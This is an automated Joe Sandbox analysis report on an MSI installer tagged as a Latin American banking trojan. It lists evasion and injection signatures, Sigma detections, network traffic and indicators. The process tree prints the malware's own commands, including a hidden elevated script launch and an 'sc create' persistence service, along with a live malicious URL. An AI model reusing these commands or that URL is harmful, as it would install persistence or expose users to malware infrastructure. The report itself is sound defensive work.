Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CrzA2u67LQ.msi

Overview

General Information

Sample name:CrzA2u67LQ.msi
renamed because original name is a hash value
Original sample name:a477e01f4afeaee40323a6981773ab20f7405c013f6a0398c9126e73d057616a.msi
Analysis ID:1450377
MD5:41eed8b68bb6ddf7bdd73d285109e460
SHA1:6a83946536e41d65d8f52f8222a3235c9877fcf3
SHA256:a477e01f4afeaee40323a6981773ab20f7405c013f6a0398c9126e73d057616a
Tags:bankerlatammsitrojan
Infos:

Detection

Score:40
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 6652 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\CrzA2u67LQ.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 4348 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2144 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI5DCF.tmp (PID: 6528 cmdline: "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\ MD5: 768B35409005592DE2333371C6253BC8)
      • cmd.exe (PID: 7228 cmdline: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7336 cmdline: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • sc.exe (PID: 7360 cmdline: sc start MeuServico MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • MSI5DEF.tmp (PID: 1868 cmdline: "C:\Windows\Installer\MSI5DEF.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ MD5: 768B35409005592DE2333371C6253BC8)
    • windows10.exe (PID: 6388 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 7216 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 7192 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 6800 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom. MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 6600 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 6748 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
        • windows10.exe (PID: 2492 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
  • cmd.exe (PID: 7220 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 7388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2224,i,6715851174139391298,17441490298513551426,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • windows10.exe (PID: 7376 cmdline: C:\Users\user\Pictures\fotosdaviagem\windows10.exe MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 6432 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 2120 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 7260 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom. MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 6680 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 6728 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 2588 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
  • svchost.exe (PID: 7532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000002.4175519677.0000000000951000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    00000018.00000002.4174825409.00000000009A1000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      00000013.00000002.4175193752.0000000000981000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        00000014.00000002.4175517301.0000000000911000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            Click to see the 5 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", CommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\, ParentImage: C:\Windows\Installer\MSI5DCF.tmp, ParentProcessId: 6528, ParentProcessName: MSI5DCF.tmp, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", ProcessId: 7228, ProcessName: cmd.exe
            Sigma detected: New Service Creation Using Sc.EXE
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, CommandLine: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7228, ParentProcessName: cmd.exe, ProcessCommandLine: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, ProcessId: 7336, ProcessName: sc.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7532, ProcessName: svchost.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for domain / URL
            Source: http://www.audio-tool.netVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dllReversingLabs: Detection: 48%
            Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dllVirustotal: Detection: 33%Perma Link
            Multi AV Scanner detection for submitted file
            Source: CrzA2u67LQ.msiVirustotal: Detection: 26%Perma Link
            Source: CrzA2u67LQ.msiReversingLabs: Detection: 31%
            Machine Learning detection for dropped file
            Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dllJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC source: MSI5DCF.tmp, 00000003.00000000.1726216258.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DCF.tmp, 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DEF.tmp, 00000004.00000000.1726938190.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, MSI5DEF.tmp, 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, CrzA2u67LQ.msi, MSI5DEF.tmp.1.dr, MSI5DCF.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: CrzA2u67LQ.msi, MSI55AB.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI5DCF.tmp, 00000003.00000000.1726216258.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DCF.tmp, 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DEF.tmp, 00000004.00000000.1726938190.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, MSI5DEF.tmp, 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, CrzA2u67LQ.msi, MSI5DEF.tmp.1.dr, MSI5DCF.tmp.1.dr
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: c:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B1069D FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00B1069D
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B2069D FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00B2069D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0097D08C FindFirstFileW,16_2_0097D08C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_008FD08C FindFirstFileW,17_2_008FD08C
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
            Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
            Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
            Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /clientes/inspecionando.php HTTP/1.1Host: winrarbrasil.from-mn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: winrarbrasil.from-mn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winrarbrasil.from-mn.com/clientes/inspecionando.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /clientes/inspecionando.php HTTP/1.1Host: winrarbrasil.from-mn.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://winrarbrasil.from-mn.com/clientes/inspecionando.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=l4wC5+uAGMYoEDn&MD=LxwYCEF6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=l4wC5+uAGMYoEDn&MD=LxwYCEF6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficDNS traffic detected: DNS query: winrarbrasil.from-mn.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Jun 2024 17:04:47 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1
            Source: svchost.exe, 0000000E.00000002.4162711913.000001D048000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 0000000E.00000002.4163305845.000001D048061000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2398619432.000001D047EB2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.4157781889.000001D043302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/advpwg3mz7ss7gbgrn55w455vr5q_2024.5.21.0/
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: svchost.exe, 0000000E.00000002.4163305845.000001D048061000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.4163305845.000001D048090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2147178855.000000007F8AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
            Source: windows10.exe, 00000005.00000000.1727345911.0000000000497000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.audio-tool.net
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2147178855.000000007F8AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047FAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F53000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1778037537.000001D047FB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
